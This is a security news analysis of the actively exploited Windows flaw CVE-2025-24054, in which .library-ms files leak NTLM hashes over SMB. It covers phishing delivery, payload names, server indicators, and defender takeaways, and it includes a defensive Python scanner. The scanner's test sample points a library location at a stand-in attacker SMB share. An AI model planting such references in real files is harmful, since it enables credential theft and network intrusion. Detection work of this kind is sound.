A newly discovered Windows vulnerability, CVE-2025-24054, has drawn immediate attention from cybersecurity professionals and threat actors alike. This high-risk flaw enables attackers to exfiltrate NTLM authentication hashes with nearly no user interaction—posing a significant threat to enterprise and individual users. Alarmingly, exploitation began just days after Microsoft released an official patch.
This vulnerability targets Windows systems and can be triggered by something as subtle as a user merely navigating to a folder containing a specially crafted .library-ms file. This minimal engagement—no clicking, no running—initiates an SMB authentication process, which leaks sensitive NTLMv2-SSP hashes to an attacker-controlled server.
Let’s break down the events, implications, and expert analysis of this alarming exploit in the sections below.
Key Events and Insights in
- CVE-2025-24054 affects Windows operating systems and was disclosed with a patch from Microsoft on March 11, 2025.
- Attackers didn’t wait. Exploitation in the wild began by March 19, highlighting the lag between patch release and widespread implementation.
- The flaw is activated via .library-ms files, which Windows uses to create saved searches.
- Simply navigating to a folder with a malicious .library-ms file triggers the vulnerability—no execution required.
- Victims unwittingly leak NTLMv2-SSP hashes, critical authentication data for Windows environments.
- These hashes can be used in NTLM relay attacks, potentially granting attackers unauthorized access to network resources.
- Malicious files were distributed through phishing campaigns, often embedded as Dropbox download links.
- Attackers used zip archives like xd.zip, which contained multiple payload files:
  - `xd.library-ms` (CVE-2025-24054)
  - `xd.url` (linked to CVE-2024-43451)
  - `xd.website` (SMB trigger via UNC)
  - `xd.lnk` (SMB hash leaker)
- Targeted campaigns were observed primarily in Poland and Romania, but hash collection servers were based globally—including in Russia, Turkey, Bulgaria, Australia, and the Netherlands.
- One server (IP: 159.196.128[.]120) had historical ties to APT28 (Fancy Bear), though no attribution is officially confirmed for this campaign.
- A second wave of attacks (around March 25) upped the ante by dropping unarchived .library-ms files—making it even easier for victims to trigger the exploit.
- Check Point Research compared this to an older issue, CVE-2024-43451, suggesting a possible mutation or code reuse.
- Microsoft corrected initial documentation confusion, reclassifying the vulnerability from CVE-2025-24071 to CVE-2025-24054.
- The vulnerability demonstrates how harmless-looking file types can become vehicles for advanced credential theft.
- Affected systems that lack SMB signing or NTLM relay protection are particularly vulnerable to post-exploitation movements.
What Undercode Says: An Analytical Breakdown
This vulnerability exemplifies the evolution of low-interaction exploits in modern cyberattacks. What makes CVE-2025-24054 particularly dangerous isn’t just the technical mechanics—but how seamlessly it blends into everyday user activity. Imagine a user opening a folder to organize files and unknowingly initiating a credential leak to a hostile server halfway across the globe.
The attack vector leverages .library-ms files, an often overlooked but powerful component in Windows. These are generally trusted by default, as they’re tied to Windows Explorer and used for saved searches. That trust is precisely what attackers exploited. Because Windows automatically initiates SMB authentication attempts even without executing the file, adversaries don’t need much to compromise a system.
The delivery mechanism—Dropbox links in phishing emails—adds another layer of deception. Users accustomed to receiving cloud storage links may not think twice about downloading and opening such files, especially if they appear to come from familiar sources. Once extracted, merely browsing the folder is enough.
What’s most unsettling is the global scale of the campaign. With relay servers located in countries spanning five continents, this wasn’t a small test run. It was a coordinated, possibly state-sponsored, effort to amass credential hashes rapidly. The mention of a server previously linked to APT28 (even if not confirmed) should raise red flags for national security entities.
Even more alarming is how this vulnerability ties into NTLM relay attacks. Once attackers have an NTLM hash, they can impersonate users within the same network, often bypassing multi-factor authentication if misconfigurations exist. This allows lateral movement within corporate systems, access to sensitive data, and potentially, full domain compromise.
For defenders, this incident reinforces several critical takeaways:
- Patch deployment must be immediate, not optional.
- SMB signing and NTLM relay protections should be mandatory, not recommended.
- User education remains a key pillar. While the exploit needs no click, users must be trained to avoid interacting with unsolicited content.
- File inspection at the endpoint level needs to go beyond executable formats. Even non-executables like .library-ms, .lnk, and .url files should trigger alerts under suspicious contexts.
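As an added example (not code from the original article or from the researchers it cites), the following Python scanner implements the file-inspection takeaway above: it parses the XML of a .library-ms file and flags any `<url>` location that is a UNC path to a host outside the organization, since that host is where Explorer will direct its SMB authentication attempt. The internal-network policy, the `.corp.example` suffix, and both sample documents are assumptions constructed for illustration.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# XML namespace of Windows Library Description (.library-ms) documents.
LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# A UNC location (\\host\share or file://host/share) names the host Explorer
# will contact over SMB, which is where the NTLM authentication attempt goes.
UNC_RE = re.compile(r"^(?:\\\\|//|file:/+)([^\\/]+)[\\/]", re.IGNORECASE)
# Assumed policy: RFC 1918 addresses and hosts under this suffix are internal.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
TRUSTED_SUFFIX = ".corp.example"  # hypothetical internal DNS suffix

def is_internal_host(host: str) -> bool:
    host = host.strip("[]").lower()
    try:
        return any(ipaddress.ip_address(host) in net for net in PRIVATE_NETS)
    except ValueError:  # not an IP literal: judge by DNS suffix instead
        return host.endswith(TRUSTED_SUFFIX)

def library_locations(xml_text: str) -> list[str]:
    """Every <url> declared under the library's search connectors."""
    root = ET.fromstring(xml_text)
    return [u.text.strip() for u in root.iter(LIB_NS + "url") if u.text]

def external_unc_hosts(xml_text: str) -> list[str]:
    """Hosts a .library-ms would make Explorer authenticate to outside the org (non-empty = alert)."""
    flagged = []
    for loc in library_locations(xml_text):
        m = UNC_RE.match(loc)
        if m and not is_internal_host(m.group(1)):
            flagged.append(m.group(1))
    return flagged

# Constructed samples (not real campaign files): one benign, one pointing at an outside host.
BENIGN = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription><simpleLocation><url>C:\\Users\\Public\\Documents</url></simpleLocation></searchConnectorDescription>
    <searchConnectorDescription><simpleLocation><url>\\\\fileserver.corp.example\\docs</url></simpleLocation></searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""
SUSPICIOUS = BENIGN.replace("\\\\fileserver.corp.example\\docs", "\\\\collector.attacker-example.net\\share")

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, external_unc_hosts(doc))  # benign [] / suspicious ['collector.attacker-example.net']
```

Run the same check over .library-ms files arriving by mail or extracted from archives on a scanning host; a non-empty result is the signal that opening the containing folder would send credentials outward.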
From a cybersecurity policy perspective, it’s essential to recognize that patches alone are no longer sufficient. Organizations must invest in proactive threat hunting, network segmentation, and zero-trust architectures to mitigate the impact of such zero-click or minimal-click threats.
Lastly, this case illustrates the need for a more aggressive global dialogue on vulnerability disclosure and exploit commodification. If threat actors can operationalize a newly disclosed flaw in under 10 days, defenders are always on the back foot. The solution isn’t just faster patching—it’s about anticipating attack behavior and building resilient environments that don’t fail when a single link in the chain is compromised.
Fact Checker Results
- Confirmed: CVE-2025-24054 is actively exploited post-patch.
- Verified: The NTLMv2 hash leakage can occur via simple folder navigation.
- Supported: SMB servers involved are spread globally, with some linked to known threat actors.
References:
Reported By: www.infosecurity-magazine.com